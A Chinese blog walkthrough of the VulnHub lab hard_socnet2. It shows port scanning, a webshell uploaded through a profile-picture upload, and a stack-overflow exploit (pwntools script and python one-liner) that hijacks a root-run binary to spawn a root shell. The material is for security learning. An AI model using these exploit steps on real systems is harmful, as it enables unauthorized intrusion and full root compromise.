vulnhub5

已于 2023-11-21 19:10:07 修改
阅读量277 收藏
点赞数 1
文章标签: linux 安全
于 2023-11-21 09:24:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64201116/article/details/134523844
版权

靶机下载地址:

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

信息收集

第一步信息收集,还是老方法我习惯 fscan 和 nmap 一起用

Fscan 简单探测全局信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.120.141

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.120.141 is alive
[*] Icmp alive hosts len is: 1
192.168.120.141:22 open
192.168.120.141:80 open
192.168.120.141:8000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.120.141:8000 code:501 len:216    title:Error response
[*] WebTitle: http://192.168.120.141    code:200 len:10609  title:Social Network

nmap 扫描全端口

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap --min-rate 10000 -p- 192.168.120.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:15 CST
Nmap scan report for 192.168.120.141
Host is up (0.000033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 00:0C:29:F4:0E:58 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds

nmap 扫描开放端口和操作系统的信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap -sT -sV -O -p 22,80,8000 192.168.120.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:16 CST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 19:16 (0:00:12 remaining)
Nmap scan report for 192.168.120.141
Host is up (0.00013s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)
MAC Address: 00:0C:29:F4:0E:58 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds

getshell

开放了两个 web 服务一个是 apache2 的,还有一个是 python 的

这里正常思路就是先访问 web 服务了,首先是 80 端口的服务

image

733 x 3991336 x 727

是一个用户登录注册的地方,因为这里没有 admin 的邮箱地址,所以我们只能尝试使用注册来看看登录后的系统是否存在漏洞

首先我们注册账号:

image

733 x 8521186 x 1378

登录后简单测一下漏洞:

image

733 x 4762190 x 1422

发现有 xss(但是没啥用)

image

733 x 1911757 x 457

测试其他漏洞:

image

733 x 5321893 x 1374

发现了文件上传,这里可以简单测试一下:

image

733 x 4051995 x 1103

传个马,似乎成功了,试一下连接:

image

733 x 4351906 x 1132

找到地址:http://192.168.120.141/data/images/profiles/3.php

image

733 x 4511950 x 1200

可以成功连接

权限提升 1

提权:

image

733 x 447806 x 491

发现这个 cve 依旧可以。。。

权限提升 2

但是这里的预期解似乎不是这个,预期解需要 Pwn

现学 Pwn 咯

我们 getshell 之后可以在/home/user 目录看到

image

733 x 352994 x 478

一个 root 权限启动的服务

我们下载到 Kali ​用 pwngdb ​调试他(未安装可以安装一下:pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy (github.com))

先用 checksec 看一下开启的保护:

┌──(kali㉿kali)-[~/Desktop]
└─$ checksec add_record 
[*] '/home/kali/Desktop/add_record'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments

除了一个 Stack,其他全关

启动一下 Pwngdb:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# gdb -q add_record
pwndbg: loaded 147 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.                                
pwndbg: created $rebase, $ida GDB functions (can be used with print/break)                                                                  
Reading symbols from add_record...
(No debugging symbols found in add_record)
------- tip of the day (disable with set show-tips off) -------
Pwndbg context displays where the program branches to thanks to emulating few instructions into the future. You can disable this with set emulate off which may also speed up debugging                            
pwndbg>

我们先测试哪里存在栈溢出(因为只会栈溢出)

先准备好多个 A 用于测试栈溢出:

┌──(kali㉿kali)-[~/Desktop]
└─$ python -c "print('A'*1000)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

用 r 执行让程序跑起来:

image

733 x 6111104 x 920

输入后发现程序异常直接退出,判断这里不存在栈溢出,接着下一个点测试:

image

733 x 6781077 x 996

同样正常退出,接着往下测试,直到最后一个 explain:

pwndbg> r
Starting program: /home/kali/Desktop/add_record 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".                                                                  
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
Employee Name(char): a
Years worked(int): 1
Salary(int): 1
Ever got in trouble? 1 (yes) or 0 (no): 1
Explain: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────
*EAX  0xffffd27e ◂— 0x41414141 ('AAAA')
*EBX  0x41414141 ('AAAA')
*ECX  0xffffd6c0 ◂— 'AAAA'
*EDX  0xffffd662 ◂— 'AAAA'
*EDI  0xffffd340 ◂— 0x41414141 ('AAAA')
*ESI  0x80488d0 (__libc_csu_init) ◂— push ebp
*EBP  0x41414141 ('AAAA')
*ESP  0xffffd2c0 ◂— 0x41414141 ('AAAA')
*EIP  0x41414141 ('AAAA')
──────────────────[ DISASM / i386 / set emulate on ]───────────────────
Invalid address 0x41414141










───────────────────────────────[ STACK ]───────────────────────────────
00:0000│ esp 0xffffd2c0 ◂— 0x41414141 ('AAAA')
... ↓        7 skipped
─────────────────────────────[ BACKTRACE ]─────────────────────────────
 ► 0 0x41414141
   1 0x41414141
   2 0x41414141
   3 0x41414141
   4 0x41414141
   5 0x41414141
   6 0x41414141
   7 0x41414141
───────────────────────────────────────────────────────────────────────

这里发现可以覆盖掉栈的地址,说明我们这里是可能存在漏洞的

如何利用呢?

利用 IDA 打开这个程序可以发现

image

733 x 3972281 x 1235

这个程序是存在 backdoor ​的,直接返回一个 system('/bin/sh')

所以只要覆盖掉 EIP ​的地址为 backdoor ​函数的地址即可执行 backdoor 返回一个 /bin/sh

下一步工作就是测试哪个位置可以覆盖 EIP,因为我们输入的 1000 个 A 中不知道具体是哪几个站住了 EIP 的地址

只知道确实是可以覆盖的:

image

733 x 5691105 x 858

所以我们利用 MSF 生成的随机字符串来定位:

msf-pattern_create -l 1000

image

733 x 3972174 x 1176

如图我们可以知道是 0Ac1 覆盖了 EIP,所以我们查找 0Ac1 前面有几个字符:

msf-pattern_offset -q 0Ab1

image

553 x 159

发现是 62 个,所以我们前面填充 62 位

开始编写 EXP:

image

733 x 6321222 x 1053

这里看到 backdoor ​的地址是 0x08048676

垃圾字符是 62 个

写 EXP:

from pwn import * 

p = process("./add_record")
backdoor = 0x8048676
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')

payload = b'a'*62 + p32(backdoor)
p.sendline(payload)
p.interactive()

但是只能在目标系统上执行不能打远程环境,用这个

python -c "import struct;print('aa\n1\n1\n1\n' + 'A'*62 + struct.pack('I',0x08048676))" > payload

然后运行

cat payload - | ./add_record

即可 getshell,并且为 root 权限,短划线 -​ 表示将前一个命令的标准输出(在这种情况下是 "payload" 字符串)重定向到 ./add_record 程序的标准输入,这样 ./add_record 将从标准输入读取 "payload" 字符串

image

733 x 1031062 x 149

Pwn 学习参考链接

【星盟安全】PWN全集,从入门到精通,最通俗易懂的CTF,持续更新中_哔哩哔哩_bilibili

pwn 学习----定位溢出点位置_pwn 通过把编译 判断溢出位置-优快云 博客

清风--
关注
vulnhub靶场 DC-5靶机 渗透详细过程
黑战士的博客
07-29 531
1.首先收集信息,真实ip,端口,网站目录,网站部署部件等2.利用文件包含来getshell3.查看权限,根据suid中的screen 4.5.0进行提权4.提权成功查看flag。
【KALI安装fscan】
qq_50673174的博客
03-07 6571
KALI环境下fscan的安装及配置
Kali安装Fscan
bscryhf的博客
11-22 1729
如果没有没有出现版本号或之前版本号,输入:cp -f $GOROOT/bin/go* /usr/bin/ #退出之后,如果go version没有出现版本号,再次输入source /etc/profile即可。#👉如果执行编译时出现连接被拒绝情况,如:connection refused,执行:export GOPROXY=https://goproxy.io。5、下载fscan git clone https://github.com/shadow1ng/fscan.git。
ctfshow刷题笔记—栈溢出—pwn61~pwn64
最新发布
Yilanchia的博客
03-02 1020
此外,leave ret 之后,程序可能会跳转到一个无效地址,导致崩溃。这几道都是与shellcode有关的题,实在是不会写,还是试了试,记录一下,收集了一些shellcode。根据之前学的知识,7(port参数)是可读可写的意思,所以,我们任然可以注入shellcode。关于shellcode我也不会写,所以去搜了一些shellcode,一般情况下还是能用的。遇到的一个问题是shellcode太长,超出了v4,v5的范围,这是为什么呢?也是地址随机化,提前运行的界面和上一道题差不多,会给一个地址。
Pwn学习-ret2shellcode
cdl10000的博客
11-04 617
此处有坑,由于环境不匹配,使用vmmap查看没有发现rwxp权限,实际该程序0x804a000 0x804b000 段具备执行权限。使用ida调试发现buf2函数地址0804A080正好位于可执行范围内,因此借用buf2函数来构造shellcode。本内容主要是pwn入门学习,大佬勿喷!------漏洞栈溢出练习。开始要做的工作都一样,查看程序保护措施,查看伪代码,查看敏感函数。没有发现敏感函数,因此需要查找能够执行的段,构造shell函数。再次计算偏移量,计算方法参考。
gdb-pwndbg encoding issue
pwd_3的博客
04-17 2197
问题描述 为了更好的调试程序,下载编译了debug版的glibc-2.23。在配置环境后,打开gdb出现了如下的warning ****** Your encoding (ANSI_X3.4-1968) is different than UTF-8. pwndbg might not work properly. You might try launching gdb with: ...
使用格式化字符串漏洞绕过Canary保护(32位ELF)萌新篇
weixin_73481933的博客
01-15 689
当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。原理是在一个函数的入口,先从fs/gs寄存器中取出一个四字节(eax)或者八字节的rax的值存在栈上(最低位都是\x00),当函数结束是会检查这个栈上的值是否和存在去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序就会执行___stack_chk_fali函数,继而保护程序。32位文件,开启了NX和Canary保护。
VulnHub
02-10
5. 尼维奥: 这可能是机器的名称或者是某个特定的挑战,需要进一步的信息来理解其含义。 6. 1个: 这可能是指2021年的第一个项目,或者表示有至少一个相关的文件或资源。 7. 2021年: 再次强调这些资源的发布时间。 8. ...
Vulnhub靶场题解
08-24
5. 提升权限:渗透成功后,往往需要在已获取的用户权限的基础上进一步提升权限,尝试获取系统的root或管理员权限。 6. 数据提取:获取到系统最高权限后,渗透测试者的最后任务是寻找并提取flag,这通常是一个隐藏的...
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
内网综合扫描工具.zip
08-25
内网扫描工具
Kali 网络扫描教程
03-25
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
内网渗透的一些工具和平台汇总
Javachichi的博客
01-18 1765
扩展性很强,兼容各种平台,独立的框架,不依赖于其他框架,提供了丰富的第三方接口,可以进行内网渗透,社工钓鱼,木马远控以及你所想要的功能,虽说是商业软件,但是好像大家都可以轻易破解,实际里面暗桩很多,使用者请自行分析。Empire,针对内网渗透的利器,跨平台的特性,类似metasploit的功能,有丰富的模块和接口,可自行添加模块和功能,针对powershell利用的最好平台,没有之一。proxifier,跨平台的端口转发和代理工具,适用windows,linux,Macos平台,代理转发利器。
墙裂推荐!!!几款好用的网安扫描工具!!!
qq_60384876的博客
01-22 3122
Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具。Nmap可以进行多种扫描:(1)、存活主机探测(2)、端口扫描及服务探测(3)、操作系统探测支持Windows/MacOS/Linux※进入下载链接中挑选对应的系统版本※Windows必须安装npcap2、GobyGoby是一款快速梳理资产暴露攻击面的情报挖掘扫描工具,即“网络空间测绘”支持多平台、多国语言。
一款内网综合安全扫描工具,全方位的安全漏扫,Star 9.6K!
2401_84215240的博客
09-21 1400
在工地项目管理里面有一句话:安全无小事,责任大于天。这句话其实同样也适用于IT行业中的信息安全。如发生了严重的信息安全事故,不仅对个人、企业会造成严重的影响,乃至对国家社会也会造成很严重的后果。比如,前一段时间如45亿国内快递信息的泄露,非法出售的万份员工简历等等信息安全事件的发生。这些事件不仅侵犯了公民的个人隐私,也暴露了相关企业在数据保护方面存在的漏洞。所以,安全在任何一个企业都会作为头等大事之一,也是很多企业IT支出的重要一项。而今天给大家介绍的就是一款全方位的内网综合扫描工具-fsacn。
kali下载fscan(通畅无阻)
jackylove55的博客
09-24 2889
如果你的kali还没有配置走clash的全局代理,建议你先去看我上一篇文章,不然下载fscan贼慢或者time out。具体相关的fscan的指令这里就不再过多赘述,仅仅只是分享一下自己搭环境过程,避免入坑。然后就会在你的fscan文件中生成一个。首先kali的换源(不在啰嗦)然后就是git fscan。然后就可以运行fscan。可以这里改成fscan。
gcc 编译 -unknown-linux-gnu,C语言再学习 -- GCC编译过程
weixin_39731916的博客
05-09 249
一、GCC简介:gcc的原名叫做GNU C语言 编译器(GNU C Compile),只能编译C语言程序,后来很快就做了扩展,支持了更多的编程语言,比如C+ Object-c ...,改名为GNC 编译器 套件(GNU Compile Collection) 支持很多的硬件和操作系统。二、编译过程C语言的编译过程可分为四个阶段:预处理->>编译->>汇编->>链...
Kernel PWN入门——Kernel ROP
weixin_66578482的博客
02-27 1327
本笔记参考自Kernel ROP - CTF Wiki ,主要记录步骤以及学习过程中的一些思考,主要用来复习,例题是强网杯 2018 - core。Kernel PWN入门——Kernel ROP 环境搭建 分析题目 找gadget 看start.sh 看init 内核启动 分析驱动文件 EXP getshell 题目给了 bzImage,core.cpio,start.sh 以及 vmlinux 四个文件,接下来简单介绍一下。
vulnhub靶机DC5搭建
02-28
### 如何设置VulnHub DC-5机器 对于希望在本地环境中部署并测试安全技能的人来说,VulnHub提供了多个虚拟机镜像用于渗透测试练习。针对DC-5这一特定目标环境,虽然官方文档可能不会提供详尽的手把手指导[^1],但可以概述一般性的安装流程。 #### 下载与准备阶段 访问[VulnHub](https://www.vulnhub.com/)网站,在搜索栏输入`DC-5`找到对应的项目页面下载ISO文件或其他形式的压缩包。确保阅读发布的描述部分了解最低硬件需求以及推荐配置。 #### 安装过程中的注意事项 当涉及到具体操作步骤时,通常建议使用VirtualBox或VMware Workstation这类支持多平台运行的hypervisor软件来加载所获取到的操作系统映像。启动新创建好的虚拟设备之前,请按照发布者给出的要求调整内存大小、CPU核心数以及其他资源分配参数以保证最佳性能表现。 #### 配置网络连接方式 为了能够顺利开展后续的任务挑战,合理规划好宿主机同客户操作系统之间的通信至关重要。可以选择桥接模式让两者处于同一局域网内实现无障碍交互;也可以采用NAT加上端口转发的方式满足基本联网功能的同时保持相对隔离的状态。 ```bash # 如果选择的是静态IP方案,则需编辑/etc/network/interfaces文件(适用于Debian系发行版) auto eth0 iface eth0 inet static address 192.168.x.y # 替换成实际可用地址 netmask 255.255.255.0 gateway 192.168.x.z # 默认路由指向所在子网内的网关 dns-nameservers 8.8.8.8 8.8.4.4 ``` #### 开始探索之旅 完成上述准备工作之后就可以正式开启对DC-5的研究了。利用已掌握的知识体系尝试发现潜在漏洞点,并通过合法手段加以验证和修复。整个过程中务必遵循道德准则,尊重版权方权益,切勿将学到的技术应用于非法目的之上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值